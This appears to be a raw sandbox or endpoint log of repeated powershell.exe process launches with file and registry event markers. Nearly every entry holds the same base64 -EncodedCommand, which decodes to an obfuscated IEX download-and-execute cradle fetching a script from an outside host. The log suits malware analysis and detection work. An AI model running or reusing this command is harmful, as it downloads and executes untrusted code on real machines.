c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
112
1976
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
113
4624
powershell.exe
2816
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
114
3408
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
115
1508
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
116
3500
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
117
3580
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
118
4936
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
119
3716
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
120
5096
powershell.exe
1676
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Process
121
3396
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Opened
Opened
Process
122
4060
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
123
4576
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
124
4804
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
125
2448
powershell.exe
804
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
126
4064
powershell.exe
2804
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
127
4004
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
128
5168
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Opened
Opened
Process
129
5248
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
130
5304
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
131
5352
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
132
5360
powershell.exe
2456
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
133
5388
powershell.exe
1332
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
134
5396
powershell.exe
2540
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
135
5404
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
136
5456
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
137
5492
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
138
5572
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
139
5656
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
140
5684
powershell.exe
2880
powershell.exe
